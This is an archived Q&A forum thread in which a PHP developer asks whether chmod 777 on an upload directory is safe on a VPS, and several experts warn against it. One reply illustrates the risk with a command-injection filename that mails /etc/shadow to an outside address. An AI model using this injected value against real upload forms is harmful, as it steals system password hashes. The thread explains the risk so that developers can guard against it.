Learn how to a build a cloud-first strategyRegister Now

x
?
Solved

Is it safe to chmod to 777 on a vps or dedicated server?

Posted on 2006-06-01
9
Medium Priority
?
588 Views
Last Modified: 2008-03-10
Hi,
I'm writing an upload app. in php. The uploaded files are moved and checked by php. But my client is on a shared hosting provider.
In order for php to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a vps or dedicated server?

kind regards,
Peter
0
Comment
Question by:petervanlaer
9 Comments
 
LVL 11

Accepted Solution

by:
kblack05 earned 1200 total points
ID: 16808623
Permissions mask 0777 is *always* dangerous because it means that anyone can read/write/execute files within that directory structure. Typically this is a managed risk, and if you must have these kinds of features it's good to investigate using the SUID features...

Have a look at this thread, it's pretty descriptive:

http://www.linuxforums.org/forum/servers/17786-working-my-way-around-0777-issue-would-suid-guid-help.html
0
 

Author Comment

by:petervanlaer
ID: 16809253
as far as i understand it, *everyone* having permission doesn't include the average joe on the internet, but only everyone who has an account or access to that machine.

if the machine is:

* on a shared hosting solution
* has anon ftp access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. right?

feel free to correct any inaccuracies in the above; i'm not a unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random joe can laser all yer stuff if they don't have an account of some sort on the machine.
0
 
LVL 11

Expert Comment

by:kblack05
ID: 16809307
Well here's the jist of it, if the perms are wide open, anything CAN and DOES happen. For example some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
0
Concerto's Cloud Advisory Services

Want to avoid the missteps to gaining all the benefits of the cloud? Learn more about the different assessment options from our Cloud Advisory team.

 
LVL 11

Expert Comment

by:kblack05
ID: 16809328
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809409
Hi,

777 permission is not secure :( on any machine, when you run a PHP your PHP script it runs as that user so I think a directory
permission of 755 will be ok for your PHP script
0
 
LVL 11

Expert Comment

by:kblack05
ID: 16809530
He's running an upload program. It needs write access.
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809602
Hi,

Yea but the PHP script is probably running with his permissions so a file 755 should be sufficiant. As he has read,write and execute
whereas the others only have read and execte
0
 
LVL 16

Expert Comment

by:xDamox
ID: 16809620
Sorry just double checked mine you will need 777 on uploads
0
 
LVL 51

Expert Comment

by:ahoffmann
ID: 16824403
simple questio, simple answer: no
0

Featured Post

Free Backup Tool for VMware and Hyper-V

Restore full virtual machine or individual guest files from 19 common file systems directly from the backup file. Schedule VM backups with PowerShell scripts. Set desired time, lean back and let the script to notify you via email upon completion.  

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

​Being a Managed Services Provider (MSP) has presented you  with challenges in the past— and by meeting those challenges you’ve reaped the rewards of success.  In 2014, challenges and rewards remain; but as the Internet and business environment evol…
Hello EE, Today we will learn how to send all your network traffic through Tor which is useful to get around censorship and being tracked all together to a certain degree. This article assumes you will be using Linux, have a minimal knowledge of …
This video shows how to quickly and easily deploy an email signature for all users in Office 365 and prevent it from being added to replies and forwards. (the resulting signature is applied on the server level in Exchange Online) The email signat…
Whether it be Exchange Server Crash Issues, Dirty Shutdown Errors or Failed to mount error, Stellar Phoenix Mailbox Exchange Recovery has always got your back. With the help of its easy to understand user interface and 3 simple steps recovery proced…
Suggested Courses
Course of the Month20 days, 15 hours left to enroll

810 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question